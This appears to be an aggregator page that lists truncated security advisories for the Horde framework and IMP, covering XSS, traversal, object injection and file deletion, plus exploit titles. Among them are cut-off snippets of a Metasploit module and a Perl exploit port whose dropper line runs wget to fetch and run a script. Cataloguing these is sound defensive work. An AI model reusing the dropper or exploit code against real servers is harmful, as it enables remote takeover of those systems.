EUVD-2007-1467

Malware in sbrugna...

UBUNTU-CVE-2025-30349

Horde IMP through 6.2.27, as used with Horde Application Framework through 5.2.23, allows XSS that leads to account takeover via a crafted text/html e-mail message with an onerror attribute that may use base64-encoded JavaScript code, as exploited in the wild in March 2025...

VulnCheck KEV: CVE-2025-30349

Horde IMP through 6.2.27, as used with Horde Application Framework through 5.2.23, allows XSS that leads to account takeover via a crafted text/html e-mail message with an onerror attribute that may use base64-encoded JavaScript code, as exploited in the wild in March 2025...

SUSE CVE-2006-3548

Multiple cross-site scripting XSS vulnerabilities in Horde Application Framework 3.0.0 through 3.0.10 and 3.1.0 through 3.1.1 allow remote attackers to inject arbitrary web script or HTML via a 1 javascript URI or an external 2 http, 3 https, or 4 ftp URI in the url parameter in services/go.php a...

SUSE CVE-2007-1473

Cross-site scripting XSS vulnerability in framework/NLS/NLS.php in Horde Framework before 3.1.4 RC1, when the login page contains a language selection box, allows remote attackers to inject arbitrary web script or HTML via the newlang parameter to login.php...

SUSE CVE-2009-0932

Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the HordeImage driver name...

SUSE CVE-2009-4363

TextFilter/lib/Horde/Text/Filter/Xss.php in Horde Application Framework before 3.3.6, Horde Groupware before 1.2.5, and Horde Groupware Webmail Edition before 1.2.5 does not properly handle data: URIs, which allows remote attackers to conduct cross-site scripting XSS attacks via data:text/html...

SUSE CVE-2014-1691

The framework/Util/lib/Horde/Variables.php script in the Util library in Horde before 5.1.1 allows remote attackers to conduct object injection attacks and execute arbitrary PHP code via a crafted serialized object in the formvars form...

[SECURITY] Fedora 30 Update: php-horde-turba-4.2.24-1.fc30

Turba is the Horde contact management application. Leveraging the Horde framework to provide seamless integration with IMP and other Horde applications, it supports storing contacts in SQL, LDAP, Kolab, and IMSP address books...

CVE-2015-8807

Cross-site scripting XSS vulnerability in the renderVarInputnumber function in horde/framework/Core/lib/Horde/Core/Ui/VarRenderer/Html.php in Horde Groupware before 5.2.12 and Horde Groupware Webmail Edition before 5.2.12 allows remote attackers to inject arbitrary web script or HTML via vectors...

Horde Application Framework <= 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/31107/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...

Horde Framework Unserialize PHP Code Execution

No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...

Horde <= 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/37351/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...

Horde <= 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/37351/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...

Horde Framework <= 3.1.3 Login.PHP Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/22984/info Horde Framework is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would execute in the context of th...

Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/31110/info Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser...

Horde Framework and IMP 2.x/3.x Cleanup Cron Script Arbitrary File Deletion Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/22985/info Horde Framework and IMP are prone to a vulnerability that allows a local attacker to delete arbitrary files in the context of the user running the application. A successful attack can reduce the integrity of...

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

Horde Framework Unserialize PHP Code Execution (CVE-2014-1691)

An arbitrary PHP code execution vulnerability has been reported in Horde . An attacker can exploit this vulnerability to execute arbitrary code with the permissions of the web server...

UBUNTU-CVE-2014-1691

The framework/Util/lib/Horde/Variables.php script in the Util library in Horde before 5.1.1 allows remote attackers to conduct object injection attacks and execute arbitrary PHP code via a crafted serialized object in the formvars form...